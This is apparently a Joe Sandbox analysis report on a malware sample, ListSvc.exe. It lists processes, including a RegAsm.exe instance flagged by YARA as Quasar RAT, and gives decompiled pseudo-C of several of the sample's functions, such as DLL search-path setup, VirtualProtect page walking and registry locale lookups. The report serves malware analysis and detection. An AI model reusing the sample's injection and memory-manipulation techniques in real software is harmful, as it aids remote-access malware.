Commandline:	'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.cmdline'
Imagebase:	0x9a0000
File size:	2170976 bytes
MD5 hash:	350C52F71BDED7B99668585C15D70EEA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: cvtres.exe PID: 6248 Parent PID: 3312

General

Start time:	08:28:30
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF3F6.tmp' 'c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP'
Imagebase:	0x340000
File size:	43176 bytes
MD5 hash:	C09985AE74F0882F208D75DE27770DFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RegAsm.exe PID: 476 Parent PID: 6656

General

Start time:	08:28:52
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x120000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RegAsm.exe PID: 6344 Parent PID: 6656

General

Start time:	08:28:53
Start date:	13/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0xc80000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ListSvc.exe PID: 6252 Parent PID: 3876 ListSvc.exeCOMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	837
Total number of Limit Nodes:	31

Executed Functions

Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}

0x004b5115
0x004b5117
0x004b511c
0x004b511c
0x004b511e
0x004b5120
0x004b5120
0x004b5128
0x004b5129
0x004b512e
0x004b5131
0x004b5134
0x004b513b
0x004b536d
0x004b536f
0x004b5372
0x004b5375
0x004b5387
0x004b5141
0x004b514b
0x004b514d
0x004b5154
0x004b515a
0x004b5167
0x004b516b
0x004b5172
0x004b5177
0x004b5179
0x004b5179
0x004b516b
0x004b517c
0x004b5188
0x004b518f
0x004b5196
0x004b5196
0x004b519b
0x004b51a8
0x004b51b4
0x004b51ba
0x004b51c1
0x004b51c6
0x004b51c6
0x004b51d4
0x004b51e0
0x004b51e0
0x004b51f3
0x004b51fb
0x004b520e
0x004b5216
0x004b5229
0x004b5231
0x004b5244
0x004b524c
0x004b525f
0x004b5267
0x004b527a
0x004b5282
0x004b5295
0x004b529d
0x004b52b0
0x004b52b8
0x004b52cb
0x004b52d3
0x004b52e6
0x004b52ee
0x004b5301
0x004b5309
0x004b531c
0x004b5324
0x004b5337
0x004b533f
0x004b533f
0x004b51b4
0x004b534a
0x004b5351
0x004b5358
0x004b5358
0x004b5360
0x004b5367
0x004b536b
0x004b536b
0x00000000
0x004b5367

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188

Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F

GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B

Strings

ntmarta.dll, xrefs: 004B532C
propsys.dll, xrefs: 004B5254
oleacc.dll, xrefs: 004B52A5
SetProcessDEPPolicy, xrefs: 004B535A
SetSearchPathMode, xrefs: 004B5344
kernel32.dll, xrefs: 004B5141
clbcatq.dll, xrefs: 004B5311
SetDefaultDllDirectories, xrefs: 004B515C
cryptbase.dll, xrefs: 004B528A
comres.dll, xrefs: 004B52F6
apphelp.dll, xrefs: 004B5239
profapi.dll, xrefs: 004B52DB
hK, xrefs: 004B51D6
userenv.dll, xrefs: 004B5203
dwmapi.dll, xrefs: 004B526F
SetDllDirectoryW, xrefs: 004B5182
setupapi.dll, xrefs: 004B521E
version.dll, xrefs: 004B52C0
hK, xrefs: 004B51A3
uxtheme.dll, xrefs: 004B51E8

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 2248137261-3182217745
Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x004af920
0x004af923
0x004af926
0x004af92f
0x004af93b
0x004af942
0x004af9ee
0x004af9ee
0x004af948
0x004af9db
0x004af9db
0x004af9e1
0x00000000
0x00000000
0x004af954
0x004af9c7
0x004af9d2
0x004af9d9
0x00000000
0x00000000
0x00000000
0x004af95c
0x004af95c
0x004af961
0x004af967
0x004af986
0x004af98d
0x004af98f
0x004af98f
0x004af98d
0x004af994
0x004af9a5
0x004af99c
0x004af9a1
0x004af9a1
0x004af9af
0x004af9c2
0x004af9c2
0x00000000
0x004af9af
0x004af954
0x00000000
0x004af9db

APIs

GetSystemInfo.KERNEL32(?), ref: 004AF92F
VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766

Uniqueness

Uniqueness Score: -1.00%

Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}

0x0040b04a
0x0040b04d
0x0040b050
0x0040b053
0x0040b055
0x0040b05b
0x0040b062
0x0040b063
0x0040b068
0x0040b06b
0x0040b070
0x0040b076
0x0040b07f
0x0040b08f
0x0040b09c
0x0040b0a3
0x0040b0aa
0x0040b0ac
0x0040b0bd
0x0040b0ca
0x0040b0d1
0x0040b0d8
0x0040b0dc
0x0040b0dc
0x0040b0d8
0x0040b0e3
0x0040b0e6
0x0040b0e9
0x0040b0f6
0x0040b103

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F

Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}

0x0040aefd
0x0040aefe
0x0040af04
0x0040af0b
0x0040af0c
0x0040af11
0x0040af14
0x0040af27
0x0040af34
0x0040af37
0x0040af37
0x0040af3e
0x0040af41
0x0040af44
0x0040af51

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519

Uniqueness

Uniqueness Score: -1.00%

Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}

0x0040ab19
0x0040ab1b
0x0040ab22
0x0040ab24
0x0040ab2a
0x0040ab31
0x0040ab32
0x0040ab37
0x0040ab3a
0x0040ab41
0x0040ab6d
0x0040ab43
0x0040ab51
0x0040ab51
0x0040ab7a
0x0040ad27
0x0040ad29
0x0040ad2c
0x0040ad2f
0x0040ad3c
0x0040ab80
0x0040ab82
0x0040ab9a
0x0040aba1
0x0040ac41
0x0040ac43
0x0040ac44
0x0040ac49
0x0040ac4c
0x0040ac5a
0x0040ac7b
0x0040acca
0x0040acd4
0x0040acec
0x0040acf6
0x0040acf6
0x0040ac7d
0x0040ac85
0x0040ac9f
0x0040aca9
0x0040aca9
0x0040acfd
0x0040ad00
0x0040ad03
0x0040ad0c
0x0040ad11
0x0040ad11
0x0040ad1f
0x0040aba7
0x0040abbc
0x0040abc3
0x00000000
0x0040abc5
0x0040abda
0x0040abe1
0x00000000
0x0040abe3
0x0040abf8
0x0040abff
0x00000000
0x0040ac01
0x0040ac16
0x0040ac1d
0x00000000
0x0040ac1f
0x0040ac34
0x0040ac3b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ac3b
0x0040ac1d
0x0040abff
0x0040abe1
0x0040abc3
0x0040aba1

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A

Strings

Software\Embarcadero\Locales, xrefs: 0040AB90, 0040ABB2
Software\CodeGear\Locales, xrefs: 0040ABD0, 0040ABEE
Software\Borland\Locales, xrefs: 0040AC0C
Software\Borland\Delphi\Locales, xrefs: 0040AC2A

Memory Dump Source

Source File: 00000000.00000002.357381892.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.357373049.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357825040.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357850219.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.357871917.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.357880206.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ListSvc.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E

Uniqueness

Uniqueness Score: -1.00%

Function 004B63A1, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t17;
				struct HWND__* _t21;
				struct HWND__* _t22;
				struct HWND__* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t36;
				intOrPtr _t39;
				int _t40;
				intOrPtr _t41;
				intOrPtr _t43;
				struct HWND__* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				intOrPtr _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t73;
				void* _t74;

				_t74 = __eflags;
				_t72 = __esi;
				_t71 = __edi;
				_t52 = __ebx;
				_pop(_t62);
				 *[fs:eax] = _t62;
				_t17 =  *0x4c1d88; // 0x0
				 *0x4c1d88 = 0;
				E00405CE8(_t17);
				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
				 *0x4ba450 = _t21;
				_t22 =  *0x4ba450; // 0x6001e
				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
				_t25 =  *0x4ba450; // 0x6001e
				 *(_t73 - 0x58) = _t25;
				 *((char*)(_t73 - 0x54)) = 0;
				_t26 =  *0x4c1d90; // 0x4d4828
				_t4 = _t26 + 0x20; // 0x16182b
				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
				 *((char*)(_t73 - 0x4c)) = 0;
				_t28 =  *0x4c1d90; // 0x4d4828
				_t7 = _t28 + 0x24; // 0xc8800
				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
				 *((char*)(_t73 - 0x44)) = 0;
